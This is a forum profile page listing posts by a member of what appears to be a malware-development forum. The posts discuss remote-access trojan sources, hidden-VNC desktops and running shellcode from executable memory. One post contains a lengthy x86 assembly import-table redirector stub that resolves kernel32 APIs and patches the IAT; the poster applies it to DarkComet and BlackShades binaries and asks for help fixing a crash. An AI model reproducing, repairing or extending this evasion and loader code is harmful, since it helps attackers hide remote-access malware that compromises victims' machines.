BSKO

Members

About BSKO

  • Content count: 22
  • Community Reputation: 2 Neutral
  • Rank: Junior Member
  • Birthday: 04/10/1983
  1. You see, you learned something this way instead of me telling you how to edit the line.
  2. I already did. Look at the PeLdr namespace and see which function will return the same type as Drop::CurrentImageSize represents, and put its name after ::. It's actually very simple, but one thing I don't get: if you don't know how to do this, what can you do with the code??? Change strings in it and call it your own?
  3. Drop::CurrentImageSize = PeLdr:: (Mbi.AllocationBase)->OptionalHeader.SizeOfImage;
     _________________________________^^ what is missing there??? If you look at the source you will see that PeLdr is defined as a namespace, so what comes after ::??? If you don't know this you need to hit the books ASAP, as you will have no use for the source code anyway.
  4. What is the problem compiling it? The code is OK and compiles in VS 2010/2012.
  5. Yes, but it's just a PoC (not even a PoC) without anything, and you even have these controls in Windows 10. Would actually be nice to see the whole full-blown thing with hooks, redirection etc. From his web page:
  6. @volty, what you're showing is the old SS-RAT RDP module, no hidden VNC in it... and slayer never made such a module for SS-RAT or BOZOK (Slayer, correct me if I'm wrong). @illuminati, hidden VNC by definition is a VNC server running and hooked to a hidden desktop created with the CreateDesktop WinAPI, thus invisible by default to the logged-on user, and there is no trace of it in this micoton or whatever the thing is called that has the source attached to this thread. So the final question is: where can this "hidden vnc" Delphi source be obtained? I have never seen or heard of a Delphi implementation of it; it should be very interesting to see, as it would need some very advanced coding/hooking. Source, anyone?
  7. I don't see hidden VNC in this Micton src? And as far as I know SS-RAT is pure shit: weak file transfer protocol, no encryption, weak reverse connection protocol and even worse thread management, not to go into it any further. Bozok is a different thing, but there is no src of it available???
  8. Try to allocate memory via VirtualAlloc with the executable flag, put the shellcode there and call it.
  9. Using this snippet - http://www.ic0de.org/showthread.php?9459-SNIPPET-Import-Redirection - it's "Slayer616's simple IAT redirector". However, when I use it I always get an access violation error; it breaks exe files. Tried with several malwares (darkcomet, bozok, blackshades etc.), and this is what I get: http://pokit.org/get/img/b3f7000e3d9ee3d98c765a7decc81c19.jpg. Saw on the original thread that steve had something similar when running even hello: http://oi38.tinypic.com/33jpf2g.jpg. Here is the relevant code (the marked line is where it makes the violation):

     asm
       pushad
       // EAT walk needed to get the address of the APIs
       mov esi, FS:30h
       mov esi, [esi+0Ch]
       mov esi, [esi+1Ch]
     @next_module:
       mov eax, [esi+08h]
       mov edi, [esi+20h]
       mov esi, [esi]
       cmp BYTE PTR [edi+12*2], al
       jne @next_module
       cmp BYTE PTR [edi], 6Bh
       je @find_kernel32_finished
       cmp BYTE PTR [edi], 4Bh
       je @find_kernel32_finished
       jmp @next_module
     @find_kernel32_finished:
       push eax
       call @deltaoffset1
       db 'GetProcAddress',0
     @deltaoffset1:
       pop edi
       mov ebx, dword ptr [eax + 3Ch]
       add ebx, eax
       cmp word ptr [ebx], 4550h
       jnz @find_error
       mov ebx, [ebx+78h]
       add ebx, eax
       mov ecx, [ebx+18h]
       dec ecx
       mov edx, [ebx+20h]
       add edx, eax
     @find_loop:
       mov esi, [edx+ecx*4]
       add esi, eax
       push edi
       push eax
       push ebx
     @cmp_loop:
       mov al, byte ptr [esi]
       mov bl, byte ptr [edi]
       sub al, bl
       jne @cmp_different
       add bl, 0
       jz @cmp_equal
       inc esi
       inc edi
       jmp @cmp_loop
     @cmp_different:
       pop ebx
       pop eax
       pop edi
       dec ecx
       cmp ecx, 0
       jne @find_loop
       jmp @find_error
     @cmp_equal:
       pop ebx
       pop eax
       pop edi
       mov edx, [ebx+24h]
       add edx, eax
       mov cx, [edx+ecx*2]
       mov edx, [ebx+1Ch]
       add edx, eax
       mov ebx, [edx+ecx*4]
       add eax, ebx
       push eax
     @find_error:
       xor eax, eax
       // Get address of VirtualAlloc
       call @deltavirtualalloc
       db 'VirtualAlloc',0
     @deltavirtualalloc:
       mov eax, [esp + 8]   // kernelbase
       push eax
       mov eax, [esp + 8]   // GetProcAddress
       call eax
       // Now we need to allocate memory
       PUSH PAGE_EXECUTE_READWRITE
       PUSH MEM_COMMIT
       PUSH 1000
       PUSH 0
       CALL eax
       mov ebx, eax
       // Get address of VirtualProtect
       call @deltavirtualprotect
       db 'VirtualProtect',0
     @deltavirtualprotect:
       mov eax, [esp + 8]   // kernelbase
       push eax
       mov eax, [esp + 8]   // GetProcAddress
       call eax
       // Now we need to change the protection flag of the IAT
       push ebx
       push PAGE_EXECUTE_READWRITE
       push 0FFFFFFFFh
       push 0FFFFFFFFh
       call eax
       // Now redirect the IAT
       mov edx, ebx
       mov ecx, 0FFFFFFFFh
       mov ebx, 0FFFFFFFFh
     @iatjmp:
       mov eax, DWORD PTR [ecx]
       mov BYTE PTR [edx], 0B8h          // mov eax, __________
       mov DWORD PTR [edx + 1h], EAX     // now append the address to mov eax
       mov WORD PTR [edx + 5h], 0E0FFh   // call eax
       mov DWORD PTR DS:[ecx], edx       // <-- this is the line that raises the access violation (red/bold in the original post)
       add ecx, 4
       add edx, 8
       cmp ecx, ebx
       jnz @iatjmp
       // Fix stack
       pop eax
       pop eax
       popad
       mov eax, 0FFFFFFFFh
       jmp eax
     end;

     So, can someone help with this? I really don't understand asm very well, so any help would be appreciated. Thanks.
  10. Any help on this, as I'm always getting an access violation?
  11. Maybe he should learn some basics first and then ask questions, as it is otherwise impossible to explain anything.
  12. Anything new in this field, except false promises and lies?
  13. You're complicating that encryption too much; the simplest XOR of the array will suffice..